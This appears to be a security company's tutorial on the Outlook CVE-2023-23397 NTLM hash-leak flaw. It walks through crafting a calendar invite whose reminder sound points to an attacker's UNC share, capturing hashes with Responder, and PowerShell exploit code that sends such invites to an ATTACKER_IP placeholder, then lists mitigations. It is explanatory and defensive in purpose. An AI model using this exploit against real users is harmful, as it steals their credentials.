Introduction
On the latest Patch Tuesday, Microsoft released 83 security fixes, one of which is the "CVE-2023-23397" vulnerability that affects all versions of the Outlook desktop app on Windows systems. However, this vulnerability does not impact the Outlook web app (OWA) or Microsoft 365 since they do not support NTLM authentication. The attacker can obtain the user's credentials and escalate privileges with these NTLM hashes by leveraging this escalation of privilege issue.
This exploit is particularly dangerous because it is a zero-click vulnerability, meaning the attacker does not require user interaction to activate it. If an infected email reaches a user's inbox, the attacker can obtain access to the user's sensitive Net-NTLMv2 credential hashes.
It is critical to implement strong email security measures, including anti-virus software and spam filters, and to educate users on identifying and avoiding suspicious emails to prevent such attacks. Further, we can use multi-factor authentication to add another layer of security to user accounts and prevent unauthorized access even if credentials are compromised.
Abusing Outlook Appointment Alerts
Microsoft Outlook allows users to add reminder notifications while sending calendar invitations. The user can also specify the audio file played during the reminder notification. This feature was intended to enable users to set up their notifications by selecting an audio file. However, a threat actor can manipulate this parameter to force Outlook to leak current password hashes to an attacker without any interaction from the victim.
To specify a Universal Naming Convention (UNC) path instead of a local file in the PidLidReminderFileParameterproperty, the attacker can use a double backslash, the IP address or name of the computer hosting the resource, the share name, and the file name. UNC is a Windows operating system feature that helps locate network resources such as shared documents, files, and printers.
Crafting a Malicious Appointment
The process to exploit this vulnerability involves the creation of a malicious calendar invitation containing a sound file that points to a file in a network share on the attacker's machine. The reference to the sound file is stored in an internal parameter called "PidLidReminderFileParameter" in the Outlook email. Additionally, the attacker must set the "PidLidReminderOverride" parameter to "true" to ensure that the embedded audio in the malicious email takes precedence over the victim's default reminder configurations.
The attacker can set up the PidLidReminderFileParameter property by specifying a UNC path that points to a network share.
When the victim receives the malicious email, the UNC path triggers an NTLM authentication process against the attacker's machine, leaking a Net-NTLMv2 hash that the attacker can later crack. If the SMB protocol is not an option, non-server versions of Windows will accept UNC paths pointing to ports 80 or 443, using HTTP to retrieve the file from a WebDAV-enabled web server.
To handle the authentication process and capture the NetNTLM hash, the attacker can use Responder, which emulates an SMB server.
We are now ready to trigger an authentication attempt via the Outlook vulnerability.
To exploit the vulnerability, we need to craft a malicious email with an appointment containing the required parameters to trigger it. To prepare for this, we will set up Responder, which will handle the authentication process and capture the NetNTLM hash.
Attackers can use the Responder tool to emulate an SMB server and capture authentication attempts against it. To create a malicious email, the attacker can manually create an appointment and modify the reminder's sound file path to point to a shared folder.
To do this, we need to click on the calendar and then the New Appointment button on the taskbar.
Multiple parameters can be configured via the UI in the appointment reminder settings window. One of these parameters is ReminderSoundFile, which needs to be assigned to a UNC path pointing to our AttackBox. Additionally, we need to set both ReminderOverrideDefault and ReminderPlaySound to true. Here is a brief explanation of each parameter:
ReminderPlaySound: A boolean value determining whether a sound will be played with the reminder.
ReminderOverrideDefault: A boolean value instructs the Outlook client to play the sound specified by ReminderSoundFile instead of the default sound.
ReminderSoundFile: A string containing the path to the sound file that will be used. For our exploit, we will use a fake shared folder located in our AttackBox
When applying any changes, click the 'Run' button. You may revisit the 'Properties' tab to verify if the modifications have been implemented correctly. Once done, add the appointment to your calendar and confirm that the reminder is set to zero minutes. Also, ensure the appointment date and time are accurate, enabling it to trigger immediately. Finally, save the appointment to your calendar.
If all went as expected, you should immediately see a reminder popping up, and you should receive the authentication attempt in your Responder console on your AttackBox as shown:
Weaponizing the Vulnerability
To exploit a vulnerability, an attacker needs to perform several steps:
Firstly, the attacker must create a malicious meeting or appointment with a custom reminder sound, directing it towards a UNC path on their computer.
Next, the attacker must send the invite to the victim via email.
Wait for the reminder to trigger a connection to the attacker's machine.
After this, the attacker can capture the Net-NTLMv2 hash, use authentication relaying, or find other ways to profit from the attack.
While steps 3 and 4 are covered by Responder, crafting a malicious appointment manually can be time-consuming.
This Powershell exploit leverages Outlook's COM objects to create emails and appointments easily. It includes two valuable functions: "Save-CalendarNTLMLeak" and "Send-CalendarNTLMLeak".
The former function creates a malicious appointment and saves it to the attacker's calendar. In contrast, the latter function creates a malicious appointment and sends it to the victim via email from the attacker's Outlook default account.
Dissecting the Exploit's Code
Both "Save-CalendarNTLMLeak" and "Send-CalendarNTLMLeak" functions create an appointment similarly. However, we will only explain how Save-CalendarNTLMLeak works. To begin with, we need to create an "Outlook. Application" object and then create the appointment.
$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')When creating the appointment using the Save-CalendarNTLMLeak function, we must set the standard parameters, such as the recipients, meeting subject, location, body, and start and end dates. The exploit sets the start date to the current time to ensure the reminder is triggered immediately.
$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)The following additional parameters will be configured to point the reminder's sound file to the attacker's server, as previously explained:
$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1
Finally, the appointment will be sent to the recipient via email:
$newcal.send()
When using the Save-CalendarNTLMLeak exploit, you need to replace the "ATTACKER_IP" with the IP address of your AttackBox in the "-remotefilepath" parameter. Note that you are sending yourself an email in this case, as only one account is on the machine. However, in a typical scenario, you would target other email addresses.
Since the exploit uses the current Outlook instance to send the email, you may receive several alerts asking permission to send emails on your behalf. Clicking "Allow" as many times as required is essential, and selecting the "Allow access for 10 minutes" checkbox can help speed up this process.
You can watch the POC and demo on our Youtube channel.
Mitigation
Implementing strong security measures is essential to prevent the vulnerability caused by a victim receiving a malicious email and clicking on a link leading to an SMB share. Such measures may include:
Educating users on how to identify and avoid suspicious emails.
Configuring network protocols properly.
Restricting access to sensitive resources.
Monitoring network traffic for suspicious activity.
Additionally, encryption and multi-factor authentication can provide an extra layer of security to user accounts and prevent unauthorized access, even if credentials are compromised.
The exploitation of this vulnerability is widespread, and it's crucial to take steps to mitigate and prevent the attack. Microsoft has recommended the following measures:
Add users to the Protected Users Security Group, which prevents NTLM from being used as an authentication mechanism.
Block outbound TCP 445/SMB traffic to prevent any post-exploitation connection.
Use the PowerShell script provided by Microsoft to scan the Exchange server and detect any attempted attacks.
Disable the WebClient service to prevent webDAV connection.
References:
Register for instructor-led online courses today!
Check out our free programs!
Reach out to us with your custom pen testing needs at: info@darkrelay.com or WhatsApp